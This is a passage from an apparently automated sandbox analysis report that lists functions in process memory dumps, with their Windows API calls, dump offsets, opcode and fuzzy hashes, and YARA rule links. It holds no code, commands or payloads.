                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 452277b5d2d64d54b632a22ee3c7793f71885d4837e437741096a6bceee58f54
                                  • Instruction ID: ec3e723c2f92e7d4463d06e3b4efc25a735d05e6924856ea28fbc5a4e62dbb19
                                  • Opcode Fuzzy Hash: 452277b5d2d64d54b632a22ee3c7793f71885d4837e437741096a6bceee58f54
                                  • Instruction Fuzzy Hash: 4821A1B2500704EFFB20DF11DC85FABF7ACEF04750F04855AFA499A241D635E9088AB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FAC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E33F803A,00000000,00000000,00000000,00000000), ref: 001FACD8
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: f5e7826ed8de038ef22b4cf631aeafa0cad31e663c52726c9520b662609e5793
                                  • Instruction ID: cd0c7879936311b0687674a8991e430485ed376f67a9368085852218c983edb4
                                  • Opcode Fuzzy Hash: f5e7826ed8de038ef22b4cf631aeafa0cad31e663c52726c9520b662609e5793
                                  • Instruction Fuzzy Hash: B1219DB5200708EFEB20CF15CC85FA6B7ECEF04750F48856AEA499B651D764E908CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C0006, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule
                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 002C0083
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: 0230e15b590580637b7d195bf403be4b35ef24ba89b97e97fd15faaf83b44abc
                                  • Instruction ID: 9eebecabce57f06b565942197d76f64476c745f1b162946c31fb42a79ab05746
                                  • Opcode Fuzzy Hash: 0230e15b590580637b7d195bf403be4b35ef24ba89b97e97fd15faaf83b44abc
                                  • Instruction Fuzzy Hash: ED217F715047849FDB22CF25DC45F62BFF4EF06310F0984AAE9848B263D275E818CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB46D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001FB4E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: af12f90520a4e8864cfbbb027f380ec9025b9a11892348a9e2474b8b1425e608
                                  • Instruction ID: e131a9b38827a9b194201f1b8f0b625ddb3e656c16e50ac038492cac738a1f42
                                  • Opcode Fuzzy Hash: af12f90520a4e8864cfbbb027f380ec9025b9a11892348a9e2474b8b1425e608
                                  • Instruction Fuzzy Hash: F02193B15087849FD7228E15DC85B62BFE8EF56714F08809AED858B253D365E808C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB3C0, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 86560c3e6381ee89a124a722ca115dd03e834db97c994764178dfdfa30ba271b
                                  • Instruction ID: 1fb5cafd85f7c56c073a32dc069282c355efd4a40acc55ab8142d91798b7b37c
                                  • Opcode Fuzzy Hash: 86560c3e6381ee89a124a722ca115dd03e834db97c994764178dfdfa30ba271b
                                  • Instruction Fuzzy Hash: 9E215E715093C49FD712CB25DC85BA2BFE4EF06210F0984EAD989CF263D265A908CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C078D, Relevance: 1.6, APIs: 1, Instructions: 62windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: ea001267e4d7da5ac0d5387bd7e3a1b5ed4ace300ecac7f434dada6c3d7954ea
                                  • Instruction ID: 3f1861eb4575f940792aa99279c59aa41d22fbd19b0b407ae53f1748954f8da6
                                  • Opcode Fuzzy Hash: ea001267e4d7da5ac0d5387bd7e3a1b5ed4ace300ecac7f434dada6c3d7954ea
                                  • Instruction Fuzzy Hash: 6F219D715093C09FDB238F25DC44A92BFB4EF17310F0985DBE9848F563D225A818DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FA5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001FA61A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c8855151d9eb04763be7124f0d7d329b38e74b8f11617f62c75556a5805498c0
                                  • Instruction ID: a8e8327a2ae8343fc9472bddaa46a09f1b5fff047579650aadb8cde8adf4aef3
                                  • Opcode Fuzzy Hash: c8855151d9eb04763be7124f0d7d329b38e74b8f11617f62c75556a5805498c0
                                  • Instruction Fuzzy Hash: 09117271409780AFDB228F51DC44A62FFF4EF5A320F08849AEE898B552D375A418DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FA65A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 001FA6CC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 81bc9b2688b0ae0d3ddb73f083619e44d39a54abdbc64b7dcc59091d5069f26f
                                  • Instruction ID: 91ae4dfd0c1ae4cb3b706568a1be64a9c1c5c262cb412ec57306ca10416c68d9
                                  • Opcode Fuzzy Hash: 81bc9b2688b0ae0d3ddb73f083619e44d39a54abdbc64b7dcc59091d5069f26f
                                  • Instruction Fuzzy Hash: B4116A7540D3C49FD7128B25CC95A92BFB4EF17220F0E80DBD9858F1A3D2695908CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C099D, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: 2dd115d54ed6a8dbf21b1f5086b5ce4710aaee1d7a861b34dc92cac805ba6fca
                                  • Instruction ID: b576adbc9bb6894b7d351c034ce5b65bbc425b3f09ce68f64a30d739d56f6b2c
                                  • Opcode Fuzzy Hash: 2dd115d54ed6a8dbf21b1f5086b5ce4710aaee1d7a861b34dc92cac805ba6fca
                                  • Instruction Fuzzy Hash: 771104765097C09FD7128F25DC85B52BFB4EF17210F0880EBDD858F263D265A918CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C0B1F, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: eb60c9a16b423932f8a8da47312125492398daa67203a6a0aae7b2ce960c809c
                                  • Instruction ID: 5d3a2f9ac00090e91534cf6d2c05e91411d967b7ae4636f008da1dbf601a8905
                                  • Opcode Fuzzy Hash: eb60c9a16b423932f8a8da47312125492398daa67203a6a0aae7b2ce960c809c
                                  • Instruction Fuzzy Hash: 5011BE71508380AFDB228F11DC45F52BFB4EF16324F0880EEED854B663C265A818DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C0032, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule
                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 002C0083
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: 4aaf6f94c1dc630874cd72affeda88a15ca93ac170c91095c0ef0c8ba85e171c
                                  • Instruction ID: ea45ad8a6300753bf131d9a3472698a02d48d7e6a8aabf6970a988eb68913fc6
                                  • Opcode Fuzzy Hash: 4aaf6f94c1dc630874cd72affeda88a15ca93ac170c91095c0ef0c8ba85e171c
                                  • Instruction Fuzzy Hash: BE119A31510704DFEB20CF65D884F62FBE4EF04310F0885AADD498B612E375E814CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB49E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 001FB4E9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: 7c52c2f84d89a3ed388ec78e524469cf60e3f6b42210d8fd97a029e1d5916e7e
                                  • Instruction ID: 4345ba4bd02e2c6e5eff128fad241d8820f29789389fffc06bda102056fbd395
                                  • Opcode Fuzzy Hash: 7c52c2f84d89a3ed388ec78e524469cf60e3f6b42210d8fd97a029e1d5916e7e
                                  • Instruction Fuzzy Hash: 47018C71604704DFEB20CF16D985B32FBE4EF14720F0880A9DE4A8B652D375E804DA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FA5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 001FA61A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 53088e63d1c4b0d4d81a2886427bb266939a4d593d55074dc5e50e816405df3b
                                  • Instruction ID: 808d3c2c20db819d166ee5b5ef6811eb00eacdcd8c01ffb5753ae2e725158f5c
                                  • Opcode Fuzzy Hash: 53088e63d1c4b0d4d81a2886427bb266939a4d593d55074dc5e50e816405df3b
                                  • Instruction Fuzzy Hash: 02016D72400704DFEB218F55D845B62FFE0EF18720F48C5AADE498A612D376A414DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB3F2, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: e90c0be4fe7fac26013a74556b78d5bc91a6ee3a59bc463e563325c0bd4345a7
                                  • Instruction ID: 2313829194013d8772dba80ba3150367f5293fc8f8160b559a5c60633979e60c
                                  • Opcode Fuzzy Hash: e90c0be4fe7fac26013a74556b78d5bc91a6ee3a59bc463e563325c0bd4345a7
                                  • Instruction Fuzzy Hash: 0001BC71904344DFEB10CF15DDC57B2FB94EF00720F4880AADE098B642D779E804CA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FB0BE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 001FB10E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: eb3287fee3c2671d8c3634d0d24c69b6c18fd4648fa845e59d6d089473bca56a
                                  • Instruction ID: 2b466ed9d84b8df5e5be1de0757d757a285409df4cbf9271fce19a4198ae93d4
                                  • Opcode Fuzzy Hash: eb3287fee3c2671d8c3634d0d24c69b6c18fd4648fa845e59d6d089473bca56a
                                  • Instruction Fuzzy Hash: 1D01A271900700ABD310CF16DC42B26FBA4FB88A20F148169ED084B741D235F515CAE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C0B4E, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: d7c16a6798057113a11a190787c31663ef372d79315db35bea90b4fefc77c41c
                                  • Instruction ID: 39d2882e71472e3b197462fe04b9b06171f90d7b22c009d3c52ef3f4334af296
                                  • Opcode Fuzzy Hash: d7c16a6798057113a11a190787c31663ef372d79315db35bea90b4fefc77c41c
                                  • Instruction Fuzzy Hash: 2301D435510700DFEB20CF15D885F65FBA0EF14328F08C1AEDD494B622D271E854DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C09CE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: 79fbbfbc76cae25c221ca35816a95a90f461b8a8bc01e9248b262bddaba2c823
                                  • Instruction ID: 5959276dd370669b3ef1f16c98af0171ccdd2fa99e823a50ecf2e0b940df6b3e
                                  • Opcode Fuzzy Hash: 79fbbfbc76cae25c221ca35816a95a90f461b8a8bc01e9248b262bddaba2c823
                                  • Instruction Fuzzy Hash: 1901F435510740DFEB20CF19D8C5B62FBA0EF15721F08C1AEDD0A8B752D2B5E858DA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002C07C6, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116492830.00000000002C0000.00000040.00000001.sdmp, Offset: 002C0000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 72b778b34de92397490d91511a8528ac1dd05f1dc7466e4edd1bfc4b38e1c147
                                  • Instruction ID: f66bf59f99da09af5148c7549a3ae0250e209a14effa0df11197855e4afcc85b
                                  • Opcode Fuzzy Hash: 72b778b34de92397490d91511a8528ac1dd05f1dc7466e4edd1bfc4b38e1c147
                                  • Instruction Fuzzy Hash: 89018F31410700DFEB208F05D885F61FBA0EF18321F08C69EDD490A612D275A868DFA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001FA69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 001FA6CC
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115870300.00000000001FA000.00000040.00000001.sdmp, Offset: 001FA000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 6aefb9165e7c8a52806790546468142cfcc0bf49340f0971ee11118c0e66cc77
                                  • Instruction ID: 2ff2e2419596d30f93f821282047690325dbb93f30b74f897c2adad565e6a748
                                  • Opcode Fuzzy Hash: 6aefb9165e7c8a52806790546468142cfcc0bf49340f0971ee11118c0e66cc77
                                  • Instruction Fuzzy Hash: 5DF0AF75500744DFEB209F05D885761FBA4EF15731F88C0AADE098B612E379A844DAA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A6CC8, Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b-F
                                  • API String ID: 0-193427478
                                  • Opcode ID: d70497fc9b642bf24f16772e70f07c64da7a542f9e65337c1c017e25e966c71b
                                  • Instruction ID: bdfb55cca00e5e5902890fb4a5a98cc7c2c119022d87ec3a179ab67595a1988d
                                  • Opcode Fuzzy Hash: d70497fc9b642bf24f16772e70f07c64da7a542f9e65337c1c017e25e966c71b
                                  • Instruction Fuzzy Hash: BB91C774E1120A9BDB04DBA4D984ADDB7F2FF89300F608269E505AB256DB31AD45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A53C0, Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li
                                  • API String ID: 0-160456080
                                  • Opcode ID: 8b625c5c875522242ff017ef8c41a4ab34786376ea54b1bc0299ab7f13c4ee73
                                  • Instruction ID: 1e6cc73e81f118070d484bcd0261582ad937919392030c2f83752c6ef662f47c
                                  • Opcode Fuzzy Hash: 8b625c5c875522242ff017ef8c41a4ab34786376ea54b1bc0299ab7f13c4ee73
                                  • Instruction Fuzzy Hash: 3F41F274E00218EFDB08DFA4D880AEEBBB2BF89300F208065E815B7255CB315D91CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A53B1, Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li
                                  • API String ID: 0-160456080
                                  • Opcode ID: c74ec2d0edeea1d48dbcf3a3d9a75d8870239c12e3939fbca35d40d637b38ae5
                                  • Instruction ID: ffaf67c2277068d256b7afd6e7eb89187af46feb6cb52858fc075de4921274da
                                  • Opcode Fuzzy Hash: c74ec2d0edeea1d48dbcf3a3d9a75d8870239c12e3939fbca35d40d637b38ae5
                                  • Instruction Fuzzy Hash: EC3104B4D14218EFDF08DFA4D984AEEBBB2BF49304F208069E401B7291DB715991CF20
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A0108, Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d
                                  • API String ID: 0-4260565401
                                  • Opcode ID: 1fec2a62e595c33a9423006f687de15e5440c2fc3dab393e62c485033a857340
                                  • Instruction ID: 6ed3dee989a60cd68ba071daaceb624d6d2b199d8746e8ebe9e12ffd752aabf7
                                  • Opcode Fuzzy Hash: 1fec2a62e595c33a9423006f687de15e5440c2fc3dab393e62c485033a857340
                                  • Instruction Fuzzy Hash: B411FE34A0130FEFCB04FFB4E9499ADB7B1EB41308B604268E91597299DF715E24DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A5789, Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53ca400b1d3420ed5ee4c870a331770e8cbe45e1971989d26608b304a4360810
                                  • Instruction ID: 2dcc94818ba8f9ee83d20797aa72dcf9eb0fee9725e7174ad8043939b66c985f
                                  • Opcode Fuzzy Hash: 53ca400b1d3420ed5ee4c870a331770e8cbe45e1971989d26608b304a4360810
                                  • Instruction Fuzzy Hash: C751B474E01219DFCB48DFA9D8949AEBBF2FF89300F248069D815AB365DB349941CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020A3AC, Relevance: .1, Instructions: 85COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6c74be7fc7ccf868e00a374ad443d0033de67f8e8467ab28fd0e384bba80772
                                  • Instruction ID: e725a2a22ec548d53e2700e93d8d57396ba88e51d2da5094e377163e4545b9cc
                                  • Opcode Fuzzy Hash: d6c74be7fc7ccf868e00a374ad443d0033de67f8e8467ab28fd0e384bba80772
                                  • Instruction Fuzzy Hash: E221C7B6504304BFD3108F05DC41E63FBA8EB85670F08C86EFD499B212D276A8048BB2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020AAC8, Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc1db21a5c2d80606c6332f390244cbfea6b5339a5d768e01a894a1d75414ead
                                  • Instruction ID: c63b973829a7bba3459ca717add716ed696a65ea48d64066c74b6f53139cd9be
                                  • Opcode Fuzzy Hash: bc1db21a5c2d80606c6332f390244cbfea6b5339a5d768e01a894a1d75414ead
                                  • Instruction Fuzzy Hash: FB316DB550D3C19FD302CF259850A56BFF4EF8A214F0889DEE8C8CB253D2759908CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020A191, Relevance: .1, Instructions: 80COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29c868dba50ad340962e4b7b4636650cde181fc3b17d941a5dae918da8c64deb
                                  • Instruction ID: 85e0f5fc06a0f16301285d703c1f8f5a34d3f353900a707500c9541159613849
                                  • Opcode Fuzzy Hash: 29c868dba50ad340962e4b7b4636650cde181fc3b17d941a5dae918da8c64deb
                                  • Instruction Fuzzy Hash: 8421D776504304BFD7118F059C41E63FFA8EB86771F08C46EFD099B612D276A9048BB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AB635, Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46be5e82ca15618c11398881d601cba43ba1ef8b2c277438808fd17d24bc7ad5
                                  • Instruction ID: 21e3d34d95bf9613f978e35d9a1020dd65869b4966504d831f4124112baa17ca
                                  • Opcode Fuzzy Hash: 46be5e82ca15618c11398881d601cba43ba1ef8b2c277438808fd17d24bc7ad5
                                  • Instruction Fuzzy Hash: 96316D70A0220AEFDB40DF64EA84A9DFBF2FB89315F51C0A5D4499B219CB309E60DF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AB5C8, Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afcf69127d9b4f924b3cc791c38337e85660fb5d455e9f82832f61aefc99a105
                                  • Instruction ID: 253bf97e27acdb95adada356f8e12ae3d2283b3fbc8e57dcc16665cc61b469bf
                                  • Opcode Fuzzy Hash: afcf69127d9b4f924b3cc791c38337e85660fb5d455e9f82832f61aefc99a105
                                  • Instruction Fuzzy Hash: 8831B170912206EFDB00EFA4E68499DFBF5FB85314F50C0A9D4499B21ADB309E60DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020A716, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28b7c6dc591fb4b3d9d210a3097d0c40998c7be882e4c73d7db909d1ff30a7cd
                                  • Instruction ID: 3531d06088fb64a48a2d459f40b1443e90bbc296f9d4a7790446191f1d84a4bf
                                  • Opcode Fuzzy Hash: 28b7c6dc591fb4b3d9d210a3097d0c40998c7be882e4c73d7db909d1ff30a7cd
                                  • Instruction Fuzzy Hash: 07214FB6504300AFD710CF05EC41E57FBE8EB89670F14C82EFD5897701E276A9148BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020A96E, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df6968d75b027044a5823c9ea03811c9410da12b89871cc8a148e65d88528c4b
                                  • Instruction ID: 386651570577b2c37320886455dd4cb8135e36c9e4bd52f08cf1c36a46797f72
                                  • Opcode Fuzzy Hash: df6968d75b027044a5823c9ea03811c9410da12b89871cc8a148e65d88528c4b
                                  • Instruction Fuzzy Hash: 30214FB6504300AFD310CF06EC41E57FBE8EB89670F14C82EFD5897701E275A9148BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0020A842, Relevance: .1, Instructions: 75COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2115909852.0000000000202000.00000040.00000001.sdmp, Offset: 00202000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 149c729475286ba0805990ce8282965080875f09e7f0e523285f2e35475f8850
                                  • Instruction ID: 0e736232eda013412a10e882bc71ae6b1212769445179426423a40840ef8912d
                                  • Opcode Fuzzy Hash: 149c729475286ba0805990ce8282965080875f09e7f0e523285f2e35475f8850
                                  • Instruction Fuzzy Hash: 392150B6504300AFD310CF05EC41E67FBE8EB89670F14C82EFD5897711E275A9148BA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002A7441, Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 70c8b62828d40175440fd1587e09bdf0421e551fde8a8c8ba138947d3e806415
                                  • Instruction ID: 031a8d66ebe385e5b0265376b2a36db68c4694e8d35ab7156712b963bcc8a92c
                                  • Opcode Fuzzy Hash: 70c8b62828d40175440fd1587e09bdf0421e551fde8a8c8ba138947d3e806415
                                  • Instruction Fuzzy Hash: 46314A70E18249DFCB04CFA5C9809AEFFB2FF8A300F2185A9C405AB255DB30AA51DB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002AE4E0, Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9021042992486393e3ac94a5bcf0cc06d0e4178b8e18bfe8a01ec1700cf8d6d
                                  • Instruction ID: 4756b78b2203cf80a5c665606a9232b4e242e664c0d25d09af23294d6774f7ff
                                  • Opcode Fuzzy Hash: f9021042992486393e3ac94a5bcf0cc06d0e4178b8e18bfe8a01ec1700cf8d6d
